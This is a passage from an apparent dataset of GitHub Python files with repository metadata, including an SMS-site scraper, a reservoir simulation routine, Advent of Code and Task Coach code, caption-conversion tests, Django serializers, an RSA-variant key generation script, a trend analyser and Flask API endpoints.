soup.find_all(\"div\", class_=\"sms-content-table\") # 有两个 sms-content-table 的 table,第一个是最新的4条信息,第二个是全部的信息。\n\tinfos = table[1].select('tbody tr')\n\tfor info in infos:\n\t\tcontent = info.find_all(\"td\")[2].text[1:-1] # 首尾各去掉空格,这就是每一条短信的内容啦,可以写入文件里面哈。\n\t\tprint(content)\n\t\tprint(\"-\"*30)\n\t\tfrom_name = re.match(r'【(.*?)】', content) # 第一个大括号里面一般就是来源名称,采用(.*?)进行最短匹配,不然默认的(.*)是贪婪匹配。\n\t\tif(from_name):\n\t\t\tfrom_name = from_name.group(0)[1:-1] # 去掉首尾的大括号【】\n\t\t\t# print(from_name)\n\t\t\tf.write(from_name + '\\n') # 逐行写入txt文档,其实也可以不用写入文件,这里主要是方便自己查看。\t\t\n\t\t\ndef sort_result(filename):\n\tresult = [] # 逐行读取文本文档中的来源名称,生成list\n\twith open(filename,'r') as f:\n\t\tfor line in f:\n\t\t\tresult.append(line.strip('\\n').split(',')[0]) \n\t\n\tname_count = {} # 定义一个元组,键名为list中的元素,键值为出现的次数\n\tfor i in set(result): # set 用于去除重复元素。\n\t name_count[i] = result.count(i)\n\n\tsorted_dict = sorted(name_count.items(), key=lambda d:d[1], reverse = True) # 按照键值对 Dict 进行从大到小排序。\n\tfor item in sorted_dict:\n\t\tprint(item[0] + ': ' + str(item[1]))\n\n\nif __name__ == '__main__':\n\tfilename = \"info.txt\" # 指定一个文本文件保存数据\n\tf = open(filename,'w')\n\tfor i in range(1,101): # 自动翻页,这里可以设定需要抓取多少页(示例是100页)\n\t\tprint(\"\\n第%s页\\n\" % i)\n\t\tlink = \"https://www.pdflibr.com/SMSContent/1?page=\" + str(i)\n\t\tget_page_info(link, f)\n\t\ttime.sleep(4) # 不要频率太快,不然容易被封IP\n\n\tf.close()\n\tprint('\\r\\n各个来源出现的频次分别为:\\r\\n')\n\tsort_result(filename)","repo_name":"chenzhaohuai/Python","sub_path":"Learn/yunduanxin.py","file_name":"yunduanxin.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3862609304","text":"from __future__ import division\nimport numpy as np\nfrom genA import genA\nfrom relPerm import relPerm\nfrom scipy.sparse import spdiags\n\n\ndef upstream(Grid, S, Fluid, V, q, T): # Return S\n\n nx=Grid['nx']; ny=Grid['ny']; nz=Grid['nz']; N=nx*ny*nz;\n\n # Volume*Porosity\n pv=Grid['V']*np.reshape(Grid['por'], N)\n\n fi=np.maximum(q,0)\n XP=np.maximum(V['x'],0); XN=np.minimum(V['x'],0);\n YP=np.maximum(V['y'],0); YN=np.minimum(V['y'],0);\n ZP=np.maximum(V['z'],0); ZN=np.minimum(V['z'],0);\n\n # Total flux into each block\n Vi=XP[:,:,0:nx]+YP[:,0:ny,:]+ZP[0:nz,:,:]\\\n -XN[:,:,1:nx+1]-YN[:,1:ny+1,:]-ZN[1:nz+1,:,:]\n Vi = np.reshape(Vi, N)\n\n pm = np.min(pv/(Vi+fi))\n cfl = ((1.0-Fluid['swc']-Fluid['sor'])/3)*pm\n Nts = np.ceil(T/cfl)\n dtx = (T/Nts)/pv\n\n A = genA(Grid,V,q)\n # Compute A*dt/|Omega_i|\n A = spdiags(dtx,0,N,N).dot(A)\n # Compute Q_in*dt/|Omega_i|\n fi = fi*dtx\n\n for t in np.arange(0,Nts):\n mw, mo, dmw, dmo = relPerm(S,Fluid)\n fw = mw/(mw+mo)\n S = S+(A.dot(fw)+fi)\n\n return S\n","repo_name":"chanshing/python_msfv","sub_path":"upstream.py","file_name":"upstream.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"707357662","text":"fs = {}\nstack = []\n\nfor line in open(0):\n act = line.split()\n if act[1] == 'cd' and act[2] != '..':\n if act[2] == '/':\n x = '/'\n stack.append(x)\n else:\n x = \"\".join(stack[-1]) + act[2] + \"/\"\n stack.append(x)\n fs[x] = 0\n\n elif act[0].isnumeric():\n for i in stack:\n fs[i] += int(act[0])\n elif act[1] == 'cd' and act[2] == '..':\n stack.pop()\n\n\n#Task1\nsize = 0\nfor i in fs.values():\n if i < 100000:\n size += i\nprint(size)\n\n#task2\nthreshold = fs['/'] -( 70000000 - 30000000)\nfs = dict(sorted(fs.items(), key=lambda x:x[1]))\n\nfor val in fs.values():\n if val > threshold:\n print(val)\n break\n","repo_name":"zorell11/advent-of-code-2022","sub_path":"07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18747218674","text":"from taskcoachlib import patterns, operating_system\nfrom taskcoachlib.i18n import _\nimport wx\nimport icons\n\n\nclass ArtProvider(wx.ArtProvider):\n def CreateBitmap(self, artId, artClient, size):\n if '+' in artId:\n w, h = size\n main, overlay = artId.split('+')\n\n overlayImage = self._CreateBitmap(overlay, artClient, size).ConvertToImage()\n overlayImage.Rescale(int(w / 2), int(h / 2), wx.IMAGE_QUALITY_HIGH)\n overlayAlpha = overlayImage.GetAlphaData()\n overlayBitmap = overlayImage.ConvertToBitmap()\n\n mainImage = self._CreateBitmap(main, artClient, size).ConvertToImage()\n mainAlpha = mainImage.GetAlphaData()\n mainImage.SetAlphaData(chr(255) * len(mainAlpha))\n mainBitmap = mainImage.ConvertToBitmap()\n\n dstDC = wx.MemoryDC()\n dstDC.SelectObject(mainBitmap)\n try:\n dstDC.DrawBitmap(overlayBitmap, w - int(w / 2), h - int(h / 2), True)\n finally:\n dstDC.SelectObject(wx.NullBitmap)\n mainImage = mainBitmap.ConvertToImage()\n\n # Just drawing works fine on OS X but clips to the destination bitmap on\n # other platforms. There doesn't seem to be anything better than this.\n resultAlpha = list()\n for y in xrange(h):\n for x in xrange(w):\n alpha = mainAlpha[y * w + x]\n if x >= w / 2 and y >= h / 2:\n alpha = max(alpha, overlayAlpha[(y - h / 2) * w / 2 + x - w / 2])\n resultAlpha.append(alpha)\n mainImage.SetAlphaData(''.join(resultAlpha))\n\n return mainImage.ConvertToBitmap()\n else:\n return self._CreateBitmap(artId, artClient, size)\n\n def _CreateBitmap(self, artId, artClient, size):\n if not artId:\n return wx.EmptyBitmap(*size)\n catalogKey = '%s%dx%d' % (artId, size[0], size[1])\n if catalogKey in icons.catalog.keys():\n bitmap = icons.catalog[catalogKey].getBitmap()\n if artClient == wx.ART_FRAME_ICON:\n bitmap = self.convertAlphaToMask(bitmap)\n return bitmap\n else:\n return wx.NullBitmap\n\n @staticmethod\n def convertAlphaToMask(bitmap):\n image = wx.ImageFromBitmap(bitmap)\n image.ConvertAlphaToMask()\n return wx.BitmapFromImage(image) \n\n\nclass IconProvider(object):\n __metaclass__ = patterns.Singleton\n\n def __init__(self):\n self.__iconCache = dict()\n self.__iconSizeOnCurrentPlatform = 128 if operating_system.isMac() else 16\n \n def getIcon(self, iconTitle): \n ''' Return the icon. Use a cache to prevent leakage of GDI object \n count. '''\n try:\n return self.__iconCache[iconTitle]\n except KeyError:\n icon = self.getIconFromArtProvider(iconTitle)\n self.__iconCache[iconTitle] = icon\n return icon\n \n def iconBundle(self, iconTitle):\n ''' Create an icon bundle with icons of different sizes. '''\n bundle = wx.IconBundle()\n for size in (16, 22, 32, 48, 64, 128):\n bundle.AddIcon(self.getIconFromArtProvider(iconTitle, size))\n return bundle\n \n def getIconFromArtProvider(self, iconTitle, iconSize=None):\n size = iconSize or self.__iconSizeOnCurrentPlatform\n # wx.ArtProvider_GetIcon doesn't convert alpha to mask, so we do it\n # ourselves:\n bitmap = wx.ArtProvider_GetBitmap(iconTitle, wx.ART_FRAME_ICON, \n (size, size)) \n bitmap = ArtProvider.convertAlphaToMask(bitmap)\n return wx.IconFromBitmap(bitmap)\n\n\ndef iconBundle(iconTitle):\n return IconProvider().iconBundle(iconTitle)\n\n\ndef getIcon(iconTitle):\n return IconProvider().getIcon(iconTitle)\n\n\ndef init():\n if operating_system.isWindows() and wx.DisplayDepth() >= 32:\n wx.SystemOptions_SetOption(\"msw.remap\", \"0\") # pragma: no cover\n try:\n wx.ArtProvider_PushProvider(ArtProvider()) # pylint: disable=E1101\n except AttributeError:\n wx.ArtProvider.Push(ArtProvider())\n\n\nchooseableItemImages = dict( \\\n arrow_down_icon=_('Arrow down'),\n arrow_down_with_status_icon=_('Arrow down with status'),\n arrows_looped_blue_icon=_('Blue arrows looped'),\n arrows_looped_green_icon=_('Green arrows looped'),\n arrow_up_icon=_('Arrow up'),\n arrow_up_with_status_icon=_('Arrow up with status'),\n bomb_icon=_('Bomb'),\n book_icon=_('Book'),\n books_icon=_('Books'),\n box_icon=_('Box'),\n bug_icon=_('Ladybug'),\n cake_icon=_('Cake'),\n calculator_icon=_('Calculator'),\n calendar_icon=_('Calendar'),\n cat_icon=_('Cat'),\n cd_icon=_('Compact disc (CD)'),\n charts_icon=_('Charts'),\n chat_icon=_('Chatting'),\n checkmark_green_icon=_('Check mark'),\n checkmark_green_icon_multiple=_('Check marks'),\n clock_icon=_('Clock'),\n clock_alarm_icon=_('Alarm clock'),\n clock_stopwatch_icon=_('Stopwatch'),\n cogwheel_icon=_('Cogwheel'),\n cogwheels_icon=_('Cogwheels'),\n computer_desktop_icon=_('Desktop computer'),\n computer_laptop_icon=_('Laptop computer'),\n computer_handheld_icon=_('Handheld computer'),\n cross_red_icon=_('Red cross'),\n die_icon=_('Die'),\n document_icon=_('Document'),\n earth_blue_icon=_('Blue earth'),\n earth_green_icon=_('Green earth'),\n envelope_icon=_('Envelope'),\n envelopes_icon=_('Envelopes'),\n folder_blue_icon=_('Blue folder'),\n folder_blue_light_icon=_('Light blue folder'),\n folder_green_icon=_('Green folder'),\n folder_grey_icon=_('Grey folder'),\n folder_orange_icon=_('Orange folder'),\n folder_purple_icon=_('Purple folder'),\n folder_red_icon=_('Red folder'),\n folder_yellow_icon=_('Yellow folder'),\n folder_blue_arrow_icon=_('Blue folder with arrow'),\n heart_icon=_('Heart'),\n hearts_icon=_('Hearts'),\n house_green_icon=_('Green house'),\n house_red_icon=_('Red house'),\n key_icon=_('Key'),\n keys_icon=_('Keys'),\n lamp_icon=_('Lamp'),\n led_blue_questionmark_icon=_('Question mark'),\n led_blue_information_icon=_('Information'),\n led_blue_icon=_('Blue led'),\n led_blue_light_icon=_('Light blue led'),\n led_grey_icon=_('Grey led'),\n led_green_icon=_('Green led'),\n led_green_light_icon=_('Light green led'),\n led_orange_icon=_('Orange led'),\n led_purple_icon=_('Purple led'),\n led_red_icon=_('Red led'),\n led_yellow_icon=_('Yellow led'),\n life_ring_icon=_('Life ring'),\n lock_locked_icon=_('Locked lock'),\n lock_unlocked_icon=_('Unlocked lock'),\n magnifier_glass_icon=_('Magnifier glass'),\n music_piano_icon=_('Piano'),\n music_note_icon=_('Music note'),\n note_icon=_('Note'),\n palette_icon=_('Palette'),\n paperclip_icon=_('Paperclip'),\n pencil_icon=_('Pencil'),\n person_icon=_('Person'),\n persons_icon=_('People'),\n person_id_icon=_('Identification'),\n person_talking_icon=_('Person talking'),\n sign_warning_icon=_('Warning sign'),\n symbol_minus_icon=_('Minus'),\n symbol_plus_icon=_('Plus'),\n star_red_icon=_('Red star'),\n star_yellow_icon=_('Yellow star'),\n trafficlight_icon=_('Traffic light'),\n trashcan_icon=_('Trashcan'),\n weather_lightning_icon=_('Lightning'),\n weather_umbrella_icon=_('Umbrella'),\n weather_sunny_icon=_('Partly sunny'),\n wrench_icon=_('Wrench'))\n\nitemImages = chooseableItemImages.keys() + ['folder_blue_open_icon',\n 'folder_green_open_icon', 'folder_grey_open_icon',\n 'folder_orange_open_icon', 'folder_red_open_icon',\n 'folder_purple_open_icon', 'folder_yellow_open_icon',\n 'folder_blue_light_open_icon']\n\nchooseableItemImages[''] = _('No icon')\n","repo_name":"TaskEvolution/Task-Coach-Evolution","sub_path":"taskcoach/taskcoachlib/gui/artprovider.py","file_name":"artprovider.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"21454219307","text":"import pytest\n\nfrom pycaption import (\n SCCReader, SCCWriter, SRTReader, SRTWriter, DFXPWriter, WebVTTWriter,\n)\n\nfrom tests.mixins import CaptionSetTestingMixIn\n\n# This is quite fuzzy at the moment.\nTOLERANCE_MICROSECONDS = 600 * 1000\n\n\nclass TestSRTtoSCCtoSRT(CaptionSetTestingMixIn):\n def _test_srt_to_scc_to_srt_conversion(self, srt_captions):\n captions_1 = SRTReader().read(srt_captions)\n scc_results = SCCWriter().write(captions_1)\n scc_captions = SCCReader().read(scc_results)\n srt_results = SRTWriter().write(scc_captions)\n captions_2 = SRTReader().read(srt_results)\n self.assert_captionset_almost_equals(\n captions_1, captions_2, TOLERANCE_MICROSECONDS\n )\n\n def test_srt_to_scc_to_srt_conversion(self, sample_srt_ascii):\n self._test_srt_to_scc_to_srt_conversion(sample_srt_ascii)\n\n\n# The following test fails -- maybe a bug with SCCReader\n# def test_srt_to_srt_unicode_conversion(self):\n# self._test_srt_to_scc_to_srt_conversion(SAMPLE_SRT_UNICODE)\n\n\nclass TestSCCtoDFXP:\n def test_scc_to_dfxp(self, sample_dfxp_from_scc_output,\n sample_scc_multiple_positioning):\n caption_set = SCCReader().read(sample_scc_multiple_positioning)\n dfxp = DFXPWriter(\n relativize=False, fit_to_screen=False).write(caption_set)\n\n assert sample_dfxp_from_scc_output == dfxp\n\n def test_dfxp_is_valid_xml_when_scc_source_has_weird_italic_commands(\n self, sample_dfxp_with_properly_closing_spans_output,\n sample_scc_created_dfxp_with_wrongly_closing_spans):\n caption_set = SCCReader().read(\n sample_scc_created_dfxp_with_wrongly_closing_spans\n )\n\n dfxp = DFXPWriter().write(caption_set)\n\n assert dfxp == sample_dfxp_with_properly_closing_spans_output\n\n def test_dfxp_is_valid_xml_when_scc_source_has_ampersand_character(\n self, sample_dfxp_with_ampersand_character,\n sample_scc_with_ampersand_character):\n caption_set = SCCReader().read(sample_scc_with_ampersand_character)\n\n dfxp = DFXPWriter().write(caption_set)\n\n assert dfxp == sample_dfxp_with_ampersand_character\n\n\nclass TestSCCToWebVTT:\n def test_webvtt_newlines_are_properly_rendered(\n self, sample_webvtt_from_scc_properly_writes_newlines_output,\n scc_that_generates_webvtt_with_proper_newlines):\n caption_set = SCCReader().read(\n scc_that_generates_webvtt_with_proper_newlines)\n webvtt = WebVTTWriter().write(caption_set)\n\n assert webvtt == sample_webvtt_from_scc_properly_writes_newlines_output\n","repo_name":"pbs/pycaption","sub_path":"tests/test_scc_conversion.py","file_name":"test_scc_conversion.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"3"} +{"seq_id":"70230399441","text":"import torch \nimport numpy as np\n# from model2_seq import TransFuser\nfrom config_seq import GlobalConfig\nfrom prettytable import PrettyTable\n# from only_image_gps_transfuser import TransFuser2\n# from two_images_gps_transfuser import TransFuser3\nfrom model_efnet_gpt import TransFuser4\nfrom model_efnet_swin import SwinFuser1\nfrom torchvision import models\n\ndevice = \"cuda:1\"\nconfig = GlobalConfig()\n\nadd_velocity = 1\nadd_mask = 0\nenhanced = 1\nangle_norm = 1 \ncustom_FoV_lidar = 1 \nfiltered = 0\nadd_seg = 0\n\nconfig.add_velocity = add_velocity\nconfig.add_mask = add_mask\nconfig.enhanced = enhanced\nconfig.angle_norm = angle_norm\nconfig.custom_FoV_lidar = custom_FoV_lidar\nconfig.filtered = filtered\nconfig.add_seg = add_seg\n\n\n# model = TransFuser4(config,device)\nmodel = SwinFuser1(config,device)\ntotal_params = sum(p.numel() for p in model.parameters())\nprint(f\"Number of parameters: {total_params}\")\n\n#for p in model.parameters():\n# print(p.numel())\n\ndef count_parameters(model):\n table = PrettyTable([\"Modules\", \"Parameters\"])\n total_params = 0\n for name, parameter in model.named_parameters():\n if not parameter.requires_grad: \n continue\n param = parameter.numel()\n table.add_row([name, param])\n total_params+=param\n print(table)\n print(f\"Total Trainable Params: {total_params}\")\n return total_params\n\ncount_parameters(model)\n\nimg_list = [torch.rand(2,3,config.crop,config.crop).to(device=device) for i in range(10)]\ngps_list = [torch.rand(2,5,2).to(device=device),torch.rand(2,5,2).to(device=device)]\n\nout = model(img_list, gps_list)\nprint(out.shape)\n\n#model2 = models.efficientnet_b0(pretrained =True)\n\n\n#block1 = models.efficientnet_b0(pretrained =True)\n#print(block1)\n","repo_name":"lingli878/V2V_swin","sub_path":"test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9768762544","text":"from dataclasses import fields\nimport dataclasses\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom api.models import Course, Driver, Rider, User\n\n\n# class UserSerializer(serializers.ModelSerializer):\n# password1 = serializers.CharField(write_only=True)\n# password2 = serializers.CharField(write_only=True)\n# group = serializers.CharField()\n\n# def validate(self, data):\n# if data['password1'] != data['password2']:\n# raise serializers.ValidationError('Passwords must match.')\n# return data\n\n# def create(self, validated_data):\n# group_data = validated_data.pop('group')\n# group, _ = Group.objects.get_or_create(name=group_data)\n# data = {key: value for key, value in validated_data.items() if key not in ('password1', 'password2')}\n# data['password'] = validated_data['password1']\n# user = self.Meta.model.objects.create_user(**data)\n# _,token = Token.objects.create(user = user)\n# token.save() \n# user.groups.add(group)\n# user.save()\n# return token\n\n# class Meta:\n# model = get_user_model()\n# fields = (\n# 'id',\n# 'username',\n# 'password1',\n# 'password2',\n# 'first_name',\n# 'last_name',\n# 'group',\n# #'photo',\n# )\n# read_only_fields = ('id',)\n\nclass UserSerializer(serializers.ModelSerializer):\n\n def create(self, validated_data):\n user = User.objects.create_user(**validated_data)\n _,token = Token.objects.get_or_create(user = user)\n return user\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'password',\n )\n validators = [\n UniqueTogetherValidator(\n queryset=User.objects.all(),\n fields=['username', 'email']\n )\n ]\n\nclass LogInSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n user_data = UserSerializer(user).data\n for key, value in user_data.items():\n if key != 'id':\n token[key] = value\n return token\n\n\nclass TripSerializer(serializers.ModelSerializer):\n class Meta:\n model = Course\n fields = '__all__'\n read_only_fields = (\n 'id',\n 'created',\n 'updated',\n )\n\n\nclass NestedTripSerializer(serializers.ModelSerializer):\n class Meta:\n model = Course\n fields = '__all__'\n depth = 1\n################serializer pour le driver############################################\nclass DriverSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = '__all__'\n\n#################### Serializer pour le Rider ########################################\n\nclass RiderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Rider\n fields = '__all__' ","repo_name":"Cheick433/Flutter_backend_django","sub_path":"UberFluttreApp/Users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11211102885","text":"# ************* XRSA Burp Table Code ***************\n\n# In[20]:\nimport time\nfile1=open(\"e_XRSA_file.txt\",\"w\")\nfile2=open(\"d_XRSA_file.txt\",\"w\")\n\n#X RSA Latest code\nfor i in range(1000):\n #key gen start-----------------------------------------------\n start_key_gen_time = time.time()\n # print(\"Key Generation:\\n\");\n p1 = generate_prime_number(1024); # 4 prime generation\n p2 = generate_prime_number(1024);\n p3 = generate_prime_number(1024);\n p4 = generate_prime_number(1024);\n # print(\"Bit size p1: \",p1.nbits())\n # print(\"Bit size p2: \",p2.nbits())\n # print(\"Bit size p3: \",p3.nbits())\n # print(\"Bit size p4: \",p4.nbits())\n # print(\"Is p1=\",p1, \"prime ? \", is_prime(p1));\n # print(\"Is p2=\",p2,\"prime ?\",is_prime(p2));\n # print(\"Is p3=\",p3, \"prime ? \", is_prime(p3));\n # print(\"Is p4=\",p4,\"prime ?\",is_prime(p4)); #CORRECT\n\n\n x = p1*p2;\n y = p3*p4;\n N = x*y; # evaluating N\n # print(\"\\nx=\",x);\n # print(\"y=\",y);\n # print(\"N=\",N); #CORRECT\n\n phi_x = (p1-1)*(p2-1); # evaluating Euler Totients: phi\n phi_y = (p3-1)*(p4-1);\n phi_N = phi_x*phi_y;\n # print(\"phi(x)=\", phi_x);\n # print(\"phi(y)=\", phi_y);\n # print(\"phi(N)=\", phi_N); #CORRECT\n\n while True: #Using this while loop cuz sometimes inverse mod doesn't exists\n try:\n\n #E1, E2 calculation\n E1 = ZZ.random_element(phi_x);\n while (gcd(E1, phi_x) != 1):\n E1 = ZZ.random_element(phi_x) #choosing E1\n # print(\"\\nE1 =\",E1);\n # print(\"*E1 < phi_x=\",E1 < phi_x); #checking conditions for E1\n # print(\"*gcd(E1,phi_x)=\",gcd(E1,phi_x)); #CORRECT\n\n E2 = ZZ.random_element(phi_y)\n while (gcd(E2, phi_y) != 1):\n E2 = ZZ.random_element(phi_y) #choosing E2\n # print(\"\\nE2 =\",E2);\n # print(\"*E2 < phi_y=\",E2 < phi_y) #checking conditions for E2\n # print(\"*gcd(E2,phi_y)=\",gcd(E2,phi_y)) #CORRECT\n\n E_dash = (E1*E2)%N\n # print(\"\\nE' = \",E_dash)\n\n D_dash = inverse_mod(E_dash,phi_N)\n break\n except:\n continue\n\n # print(\"D' = \",D_dash)\n\n E=(E_dash).__xor__(N); #print(\"\\nE = \",E) #CORRECT\n D=(D_dash).__xor__(N); #print(\"D = \",D) #CORRECT\n\n # print(\"\\npublic key = (\",N, \",\",E,\")\"); #Generated Key pairs\n # print(\"private key = (\",N, \",\",D,\")\\n\");\n file1.write(str(E)+\"\\n\")\n file2.write(str(D)+\"\\n\")\n\n final_key_gen_time = time.time()\n #key gen finish----------------------------------------------\n\n total_key_gen_time = final_key_gen_time - start_key_gen_time\n # print(\"\\nTotal Key generation time taken in seconds: \", total_key_gen_time )\n\n #Encryption start------------------------------------------\n start_encrypt_time = time.time()\n # print(\"\\nENCRYPTION:-------\");\n M = 59; #print(\"original msg=\",M) #original message M\n\n E_double_dash = (E).__xor__(N); #print(\"E'' = \",E_double_dash)\n C = power_mod(M,E_double_dash,N); #print(\"encrypted msg=\",C) #encrypted message C #CORRECT\n finish_encrypt_time = time.time()\n #Encryption finish------------------------------------------\n\n total_encrypt_time = finish_encrypt_time - start_encrypt_time\n # print(\"\\nTotal encrypt taken in seconds: \", total_encrypt_time )\n\n #Decryption start---------------------------------------------\n start_decrypt_time = time.time() \n # print(\"\\nDECRYPTION:-------\");\n D_double_dash = (D).__xor__(N); #print(\"D'' = \",D_double_dash)\n decrypt_msg = power_mod(C,D_double_dash,N) # decrypting #CORRECT\n #print(\"decrypted msg=\",decrypt_msg)\n finish_decrypt_time = time.time()\n #Decryption finish-------------------------------------------------\n\n total_decrypt_time = finish_decrypt_time - start_decrypt_time\n # print(\"\\nTotal decrypt time taken in seconds: \", total_decrypt_time )\n\n # Total Execution Time\n total_time_taken = total_key_gen_time + total_encrypt_time + total_decrypt_time\n # print(\"\\n\\nTotal algorithm time taken in seconds: \", total_time_taken)\n\n print(\"\\nIs decrypted msg & original msg same?\", (decrypt_msg==M))\n \nfile1.close()\nfile2.close()\n","repo_name":"Razaimam45/XRSA-An-enhanced-RSA-version","sub_path":"Variant Implementations/1000_e_d_generation_code_XRSA.py","file_name":"1000_e_d_generation_code_XRSA.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2013888061","text":"import re\r\n\r\n\r\ndef bigrams(text):\r\n words = text.split()\r\n return zip(words, words[1:])\r\n\r\ndef trigrams(text):\r\n words = text.split()\r\n return zip(words, words[1:], words[2:])\r\n\r\n\r\ndef ngram_probs(filename='raw_sentences.txt'):\r\n file = open(filename, 'r')\r\n sentence = file.read()\r\n text = re.sub('\\W', ' ', sentence.lower())\r\n words = text.split()\r\n def bigram_probs(compare):\r\n num = 0\r\n for i in zip(words, words[1:]):\r\n if i == list:\r\n num = num + 1\r\n return num\r\n def trigram_probs(compare):\r\n num = 0\r\n for i in zip(words, words[1:], words[2:]):\r\n if i == list:\r\n num = num + 1\r\n return num\r\n return bigram_probs, trigram_probs\r\n\r\n\r\na, b = ngram_probs()\r\n\r\nprint(a([('we', 'are')]))\r\n","repo_name":"YiWeiWayne/Test","sub_path":"English_count.py","file_name":"English_count.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1363534669","text":"import pandas as pd\r\n# from IPython.display import display\r\n\r\nlinks_df = pd.read_csv(\"./preprocess/links.csv\")\r\nlinks_df = links_df.dropna(axis=0)\r\nlinks_df['tmdbId'] = links_df['tmdbId'].astype(int)\r\n\r\nratings_df = pd.read_csv(\"./preprocess/ratings_small.csv\")\r\nratings_df = ratings_df.drop(['timestamp'], axis=1)\r\n\r\nnull = links_df.isnull().sum()\r\nprint(null)\r\nnull = ratings_df.isnull().sum()\r\nprint(null)\r\n# print(\"links len : \", len(links_df))\r\n# print(\"ratings len : \", len(links_df))\r\n\r\nmerge_df = pd.merge(links_df, ratings_df, on=\"movieId\", )\r\nmerge_df = merge_df[[\"userId\", \"tmdbId\", \"rating\"]]\r\n\r\nmerge_df.to_csv(\"./preprocess/merge.csv\")\r\n","repo_name":"AIHub-Cinemaster/movie-csv-preprocess","sub_path":"csv_merge.py","file_name":"csv_merge.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26734293954","text":"from itertools import groupby\nimport pymannkendall as mk\nimport numpy as np\n\nfrom trend.analysis.mlr_time_series_segmenter import MlrTimeSeriesSegmenter\nfrom models.models import Trend, TrendType\n\n\ndef get_trend_analyser():\n return TrendAnalyser()\n\n\nclass TrendAnalyser:\n def analyse(self, x, y) -> (list[int], list[Trend]):\n time_series_segmenter = MlrTimeSeriesSegmenter(min_segment_length=4)\n\n if all(val == 0 for val in y):\n return [], self.__get_trends_for_segments(x, y, [(0, len(x) - 1)])\n\n y_adjusted = (y / np.max(y)) * 100\n cuts = time_series_segmenter.segment(x, y)\n\n if len(cuts) == 0:\n return [], self.__get_trends_for_segments(x, y_adjusted, [(0, len(x) - 1)])\n\n cuts_i = [0] + [x.index(cut) for cut in cuts] + [len(x) - 1]\n\n # Sub-trends\n segments = [(cuts_i[i], cut) for i, cut in enumerate(cuts_i[1:])]\n\n trends = self.__get_trends_for_segments(x, y_adjusted, segments)\n trend_slopes = [trends[i].type.value for i in range(len(trends))]\n\n merged_segments = []\n for k, g in groupby(enumerate(trend_slopes), key=lambda i_x: i_x[1]):\n group = list(g)\n start_index = group[0][0]\n end_index = group[-1][0]\n merged_segments.append(\n (segments[start_index][0], segments[end_index][1]))\n\n # Whole time series\n merged_segments = [(0, len(x) - 1)] + merged_segments\n\n return [x[start] for (start, _) in merged_segments[2:]], self.__get_trends_for_segments(x, y_adjusted, merged_segments)\n\n def __get_trends_for_segments(self, x, y, segments):\n slopes = [mk.sens_slope(\n y[start:end + 1]).slope for start, end in segments]\n trends = [0 if np.abs(slope) < 1 else int(np.sign(slope))\n for slope in slopes]\n\n return [\n Trend(\n start=x[segments[i][0]],\n end=x[segments[i][1]],\n type=TrendType.NONE if trends[i] == 0 else (\n TrendType.INCREASING if trends[i] == 1 else TrendType.DECREASING),\n slope=slopes[i],\n line=np.polyfit(x[segments[i][0]:segments[i][1] + 1],\n y[segments[i][0]:segments[i][1] + 1], 1).tolist()\n ) for i in range(len(segments))\n ]\n\n # pettit test\n","repo_name":"nreinartz/tatdd-backend","sub_path":"src/trend/analysis/trend_analyser.py","file_name":"trend_analyser.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24321302005","text":"from server.server import Server\nfrom database.entities.agent import Agent\nfrom database.handler.agent_handler import AgentHandler\n\nfrom flask import request\n\n# Gets an agent by id\n@Server.app.route('/agent/get', methods=['Get'])\n@Server.token_required\n@Server.returns_json\ndef get_agent():\n \"\"\"Returns an agent by id.\n ---\n tags:\n - Agents\n parameters:\n - name: id\n in: query \n type: integer\n required: true\n default: 1\n definitions:\n Agent:\n type: object\n properties:\n id: \n type: integer\n creation_date:\n type: string\n name:\n type: string\n url: \n type: string\n api_token:\n type: string\n vc_type: \n type: string\n security:\n - APIKeyHeader: ['x-auth-token']\n responses:\n 200:\n description: The agent\n schema:\n $ref: '#/definitions/Agent'\n \"\"\"\n id = request.args[\"id\"]\n agent = AgentHandler.get(id)\n return agent\n\n# Gets all agents\n@Server.app.route('/agent/getall', methods=['Get'])\n@Server.token_required\n@Server.returns_json\ndef getAll_agent():\n \"\"\"Returns all stored agents.\n ---\n tags:\n - Agents\n definitions:\n AgentList:\n type: array\n items:\n $ref: '#/definitions/Agent'\n security:\n - APIKeyHeader: ['x-auth-token']\n responses:\n 200:\n description: The agent list\n schema:\n $ref: '#/definitions/AgentList'\n \"\"\"\n agents = AgentHandler.getAll()\n return agents\n\n# Stores a new agent\n@Server.app.route('/agent/add', methods=['Post'])\n@Server.token_required\n@Server.contentType_json\ndef add_agent():\n \"\"\"Stores a new agent.\n ---\n 